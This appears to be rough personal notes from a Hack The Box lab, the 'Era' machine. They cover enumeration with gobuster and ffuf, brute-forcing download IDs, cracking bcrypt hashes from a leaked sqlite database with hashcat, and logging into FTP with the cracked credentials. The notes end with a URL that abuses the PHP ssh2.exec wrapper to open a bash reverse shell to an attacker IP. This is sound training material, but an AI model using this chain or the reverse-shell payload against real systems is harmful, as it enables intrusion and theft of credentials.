My Ip HTB: 10.10.14.235
Machine Name: Era Hackthebox

What ports are open?
21/tcp ftp vsftp 3.0.5
80/tcp http nginx 1.18.0 (ubuntu)

What applications are running?
website- Era Designs

What tools could be used?

Nikto- 

Notes:

"Contact us" Field found but not vulnerable to xss

nmap -p21 --script=ftp-anon,ftp-bounce,ftp-syst,ftp-vsftpd-backdoor 10.10.11.79
No result (did not work)

gobuster dir -u http://era.htb/ -w DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html

-----------------------------------------------------------------------------

-----------------------------------------------------------------------------
Current Directoris:

/css                  (Status: 301) [Size: 178] [--> http://era.htb/css/]
/fonts                (Status: 301) [Size: 178] [--> http://era.htb/fonts/]
/img                  (Status: 301) [Size: 178] [--> http://era.htb/img/]
/index.html           (Status: 200) [Size: 19493]
/js                   (Status: 301) [Size: 178] [--> http://era.htb/js/]

-----------------------------------------------------------------------------------------------------------------------

scan subdomain:

Starting gobuster in VHOST enumeration mode
===============================================================
Found: file.era.htb Status: 200 [Size: 6765]
Progress: 4989 / 4990 (99.98%)
===============================================================

------------------------------------------------------------------------------------------------------------------------
Tested the Security question but it did not have any vulnerability

=======================================================================================================================
Scanned the subdomain for extra clue:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://file.era.htb/FUZZ -e .php,.html,.txt,.js,.json,.xml,.bak,.old -fs 6765 -fc 404 -t 50

images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 38ms]
logout.php              [Status: 200, Size: 70, Words: 6, Lines: 1, Duration: 37ms]
register.php            [Status: 200, Size: 3205, Words: 1094, Lines: 106, Duration: 39ms]
login.php               [Status: 200, Size: 9214, Words: 3701, Lines: 327, Duration: 39ms]
download.php            [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
files                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 35ms]
assets                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 35ms]
upload.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
manage.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 42ms]
layout.php              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
.html                   
reset.php        
-----------------------------------------------------------------------------------------------
I register with the following creds:
username: admin
password: kigniscool

successful
------------------------------------------------------------------------------------------------
Brutforce the id 

ffuf -w <(seq 0 10000) -u 'http://file.era.htb/download.php?id=FUZZ' -H "Cookie: PHPSESSID=d8b63p5kdql4oc9ctfhpt65cq9" -fc 302

with this command I found 2 id that were different from the crowed 154,54 these two Id were the key

I downloaded the 2 files from the ID that I found in the url paremeter

Files Names:
	signing.zip
	site-backup-30-08-24.zip

Unzipped them and found:

signing: key.pem  x509.genkey
site-backup: 
	bg.jpg                layout_login.php  screen-download.png
	css                   layout.php        screen-login.png
	download.php          LICENSE           screen-main.png
	filedb.sqlite         login.php         screen-manage.png
	files                 logout.php        screen-upload.png
	functions.global.php  main.png          security_login.php
	hashes.txt            manage.php        upload.php
	hashe.txt             register.php      webfonts
	index.php             reset.php
	initial_layout.php    sass
----------------------------------------------------------------------------------------------------------------------------------------

filedb.sqlite:
	sqlite> SELECT * FROM users;
	1|admin_ef01cab31aa|$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC|600|Maria|Oliver|Ottawa
	2|eric|$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm|-1|||
	3|veronica|$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK|-1|||
	4|yuri|$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.|-1|||
	5|john|$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6|-1|||
	6|ethan|$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC|-1|||

used the hashcat Command below to crack the password hashes
hashcat -m 3200 hashe.txt /usr/share/wordlists/rockyou.txt -w 3 -O --username


Got the Following Result:

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

=============================================================================================================================================
using the command below I'm able to copy all of the files in the remote host into my machine (it will copy into your current directory)
wget -r --ftp-user=yuri --ftp-password=mustang ftp://10.10.11.79/ -P era_ftp_files/

https://www.php.net/manual/en/wrappers.ssh2.php

python3 -c 'import pty; pty.spawn("/bin/bash")'

http://file.era.htb/download.php?id=999&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.155%2F4444%200%3E%261;true%27
